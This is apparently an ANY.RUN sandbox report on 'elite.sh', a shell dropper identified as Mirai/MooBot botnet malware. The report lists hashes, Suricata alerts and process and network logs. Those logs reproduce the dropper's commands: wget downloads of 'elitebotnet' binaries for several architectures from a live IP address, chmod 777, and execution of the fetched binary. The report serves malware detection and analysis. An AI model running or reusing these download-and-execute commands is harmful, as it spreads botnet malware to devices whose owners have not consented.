Malware analysis elite.sh Malicious activity | ANY.RUN

Add for printing

File name:	elite.sh
Full analysis:	https://app.any.run/tasks/f7bb7b10-8f75-4311-8298-8db019407e37
Verdict:	Malicious activity
Threats:	A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet. Mirai is a self-propagating malware that scans the internet for vulnerable IoT devices and infects them to create a botnet. Mirai variants utilize lists of common default credentials to gain access to devices. Mirai's primary use is for launching distributed denial-of-service (DDoS) attacks, but it has also been used for cryptocurrency mining. Malware Trends Tracker >>>
Analysis date:	December 13, 2024, 19:08:04
OS:	Ubuntu 22.04.2 LTS
Tags:	mirai botnet moobot
Indicators:
MIME:	text/plain
File info:	ASCII text
MD5:	7E6F39C9C0311FD5D4F1D16B640153D6
SHA1:	2D2CE1810D337C2673AFCA7343C393C42974A0C2
SHA256:	A712E812014D2D1D33897B8B0FCEE8A556CD66032F40C62A943BE5EBA4509A83
SSDEEP:	6:Sn0MbcaRaD1ASaRicaR30MbcDASlq2d0MbcY5AS3/V0MbcHGNI1ASeg30Mbcr6As:+a54Osrp5VNI1g66/PRDFgJ54a

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Add for printing

MALICIOUS
- MIRAI has been detected (SURICATA)
  - watchdog (PID: 38762)
  - wget (PID: 38797)
- MOOBOT has been detected (SURICATA)
  - watchdog (PID: 38762)
SUSPICIOUS
- Modifies file or directory owner
  - sudo (PID: 38743)
- Executes commands using command-line interpreter
  - sudo (PID: 38746)
- Potential Corporate Privacy Violation
  - wget (PID: 38763)
  - wget (PID: 38777)
  - wget (PID: 38750)
  - wget (PID: 38791)
  - watchdog (PID: 38811)
  - wget (PID: 38785)
  - wget (PID: 38781)
- Executes the "rm" command to delete files or directories
  - dash (PID: 38757)
- Uses wget to download content
  - bash (PID: 38747)
- Contacting a server suspected of hosting an CnC
  - watchdog (PID: 38762)
INFO
No info indicators.

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

288

Monitored processes

80

Malicious processes

9

Suspicious processes

0

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
38742	/bin/sh -c "sudo chown user /tmp/elite\.sh && chmod +x /tmp/elite\.sh && DISPLAY=:0 sudo -iu user /tmp/elite\.sh "	/usr/bin/dash	—	any-guest-agent
User: root Integrity Level: UNKNOWN
38743	sudo chown user /tmp/elite.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
38744	chown user /tmp/elite.sh	/usr/bin/chown	—	sudo
User: root Integrity Level: UNKNOWN Exit code: 0
38745	chmod +x /tmp/elite.sh	/usr/bin/chmod	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
38746	sudo -iu user /tmp/elite.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN
38747	-bash --login -c \/tmp\/elite\.sh	/usr/bin/bash	—	sudo
User: user Integrity Level: UNKNOWN
38748	/usr/bin/locale-check C.UTF-8	/usr/bin/locale-check	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
38750	wget http://91.202.233.202/elitebotnet.x86	/usr/bin/wget		bash
User: user Integrity Level: UNKNOWN Exit code: 0
38753	chmod 777 Desktop Documents Downloads elitebotnet.x86 Music Pictures Public snap Templates test_files Videos	/usr/bin/chmod	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
38754	./elitebotnet.x86 elitebotnet.x86	/home/user/elitebotnet.x86	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0

Add for printing

Executable files

0

Suspicious files

1

Text files

0

Unknown types

0

Dropped files

PID	Process	Filename		Type
38750	wget	/home/user/bin/watchdog		o
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

7

TCP/UDP connections

3

DNS requests

8

Threats

49

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
38781	wget	GET	200	91.202.233.202:80	http://91.202.233.202/elitebotnet.arm6	unknown	—	—	malicious
—	—	GET	204	91.189.91.97:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
38750	wget	GET	200	91.202.233.202:80	http://91.202.233.202/elitebotnet.x86	unknown	—	—	malicious
38777	wget	GET	200	91.202.233.202:80	http://91.202.233.202/elitebotnet.arm5	unknown	—	—	malicious
38763	wget	GET	200	91.202.233.202:80	http://91.202.233.202/elitebotnet.arm	unknown	—	—	malicious
38791	wget	GET	—	91.202.233.202:80	http://91.202.233.202/elitebotnet.m68k	unknown	—	—	malicious
38785	wget	GET	200	91.202.233.202:80	http://91.202.233.202/elitebotnet.arm7	unknown	—	—	malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
1178	snap-store	195.181.175.40:443	odrs.gnome.org	Datacamp Limited	DE	whitelisted
38750	wget	91.202.233.202:80	—	M247 Ltd	TM	malicious

DNS requests

Domain	IP	Reputation
google.com	142.250.184.206 2a00:1450:4001:829::200e	whitelisted
connectivity-check.ubuntu.com	91.189.91.97 91.189.91.98 185.125.190.97 185.125.190.17 91.189.91.49 185.125.190.98 185.125.190.96 185.125.190.48 185.125.190.18 91.189.91.96 185.125.190.49 91.189.91.48 2620:2d:4000:1::96 2001:67c:1562::23 2620:2d:4000:1::98 2620:2d:4002:1::198 2620:2d:4000:1::23 2620:2d:4000:1::2b 2620:2d:4002:1::196 2620:2d:4002:1::197 2620:2d:4000:1::22 2001:67c:1562::24 2620:2d:4000:1::2a 2620:2d:4000:1::97	whitelisted
odrs.gnome.org	195.181.175.40 169.150.255.180 37.19.194.80 169.150.255.183 195.181.170.19 207.211.211.26 212.102.56.179 2a02:6ea0:c700::101 2a02:6ea0:c700::11 2a02:6ea0:c700::18 2a02:6ea0:c700::19 2a02:6ea0:c700::112 2a02:6ea0:c700::21 2a02:6ea0:c700::107	whitelisted
api.snapcraft.io	185.125.188.59 185.125.188.55 185.125.188.58 185.125.188.54 2620:2d:4000:1010::42 2620:2d:4000:1010::117 2620:2d:4000:1010::6d 2620:2d:4000:1010::2e6	whitelisted

Threats

PID	Process	Class	Message
—	—	Misc Attack	ET DROP Spamhaus DROP Listed Traffic Inbound group 13
—	—	Potentially Bad Traffic	ET INFO x86 File Download Request from IP Address
—	—	Potentially Bad Traffic	ET HUNTING Suspicious GET Request for .x86
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Malware Command and Control Activity Detected	ET MALWARE ELF/MooBot Mirai DDoS Variant Server Response
—	—	Potentially Bad Traffic	ET INFO ARM File Download Request from IP Address
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potentially Bad Traffic	ET HUNTING Suspicious GET Request for .arm file File
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potentially Bad Traffic	ET HUNTING Suspicious GET Request for .arm file File

Add for printing

No debug info

General Info

elite.sh

7E6F39C9C0311FD5D4F1D16B640153D6

2D2CE1810D337C2673AFCA7343C393C42974A0C2

A712E812014D2D1D33897B8B0FCEE8A556CD66032F40C62A943BE5EBA4509A83

6:Sn0MbcaRaD1ASaRicaR30MbcDASlq2d0MbcY5AS3/V0MbcHGNI1ASeg30Mbcr6As:+a54Osrp5VNI1g66/PRDFgJ54a

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

MIRAI has been detected (SURICATA)

MOOBOT has been detected (SURICATA)

SUSPICIOUS

Modifies file or directory owner

Executes commands using command-line interpreter

Potential Corporate Privacy Violation

Executes the "rm" command to delete files or directories

Uses wget to download content

Contacting a server suspected of hosting an CnC

INFO

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings